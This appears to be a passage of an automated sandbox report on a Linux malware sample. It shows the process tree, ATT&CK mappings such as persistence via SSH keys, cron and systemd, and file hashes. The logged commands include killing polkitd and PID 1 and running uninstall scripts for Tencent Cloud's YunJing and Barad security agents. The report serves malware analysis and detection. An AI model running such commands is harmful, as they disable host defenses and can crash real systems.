/usr/bin/killallkillall polkitd3⤵
- Reads runtime system information
-
-
-
/bin/bash/bin/bash -c "kill -9 polkitd"2⤵
-
-
/bin/sh/bin/sh -c "kill -9 polkitd"2⤵
- Command and Scripting Interpreter: Unix Shell
-
-
/bin/bash/bin/bash -c "kill -9 1"2⤵
-
-
/bin/sh/bin/sh -c "kill -9 1"2⤵
- Command and Scripting Interpreter: Unix Shell
-
-
/bin/bash/bin/bash -c "pkill 1"2⤵
-
-
/usr/bin/pkillpkill 12⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
/usr/local/qcloud/YunJing/uninst.sh/usr/local/qcloud/YunJing/uninst.sh1⤵
-
/usr/local/qcloud/monitor/barad/admin/uninstall.sh/usr/local/qcloud/monitor/barad/admin/uninstall.sh1⤵
-
/etc/.localconfig/updatemand/localupdatemanager/etc/.localconfig/updatemand/localupdatemanager1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Unix Shell
1Scheduled Task/Job
1Cron
1Persistence
Account Manipulation
1SSH Authorized Keys
1Boot or Logon Autostart Execution
3XDG Autostart Entries
1Boot or Logon Initialization Scripts
1RC Scripts
1Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Scheduled Task/Job
1Cron
1Privilege Escalation
Account Manipulation
1SSH Authorized Keys
1Boot or Logon Autostart Execution
3XDG Autostart Entries
1Boot or Logon Initialization Scripts
1RC Scripts
1Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Scheduled Task/Job
1Cron
1Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Impair Defenses
1Disable or Modify Tools
1Virtualization/Sandbox Evasion
2System Checks
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
931B
MD54d325ada6382f28b57d6c704d50da042
SHA1d2aac70767c09e7f58e7491af279db1ab57544c1
SHA256022bf91672fc13e29a14b02d0e99ca0e40ba072e11afb635d5fbc8ab4315c38a
SHA512ab6be2f419956e1e9b0d24fe5268df5a82ddcd4b358ccda1f560da6a03fdc9e01c9145d190722f809d50db889258958e9d92fb54bc85a6af902d4703a43a608e
-
Filesize
2KB
MD530bd2ba34252c740e69c762c5f46060f
SHA1eb0a73fceaea97f3e6729c1a01b0cddb238fabd0
SHA2564cf410b448a36720a1262d1aee3ea25942f0f9c7007d451a7ebddf6969e6edcf
SHA512bdb8f8127406ba55346178743d11ddb47f59132c45b67e694f8a894981fb381498b8de7a981f6fae6d8708be43fc0fca2389b238d142dedab82a8f335d907be5
-
Filesize
8.5MB
MD54419f5340ebc0527e3650594ede72e3a
SHA12a6b6c68d49fa5037bc3aa169ce3cfcc59b20518
SHA25659d559982680c1e73472ee34dc37bed95503dff168b0d025c1fa634a19a925d7
SHA512f3a5b31ed4acb34bd43b4d65f1afb01b0170a8bfa0451ea6bf04fbf7ad7217a0491c8ffdeebc0f9bfe349c786fee34377443df8d2dbba7571f4be3b0be0e52b9
-
Filesize
325B
MD50f15b457e0d0deebb37816494ff886ba
SHA1ca805d4a92a8e59a153e4a62579a200e6247f537
SHA256f4405eb07bc3b0f5e4b2194ab44f7830981d1b316c35c18a366c08e13c5bb3e6
SHA512668bf3fb006f19cbbb820af732784aadb6ae4c17cabcbd35d87eed003bd6031e12539f754bf0d3d6ef03f635b6661531218f87a7bd1457c712798a3312eac0a6
-
Filesize
245B
MD5d1357b7a301859888e9617a94bdbc70d
SHA15a9f911e6486f4d9eb08eb8bb1a8edb3eefc310b
SHA256582d5ebf4bb56746868db528d20a70678e6723d19560f845c7bfd6dacd85b861
SHA512016f0cb4c4fd20bb7185cebdf933b414ac8375c77d04eb9aeb4ccc3838684fe8434cd0d35ee90a35c2095a174b84bbe5f2a7aac6908509c23a97264881b99f38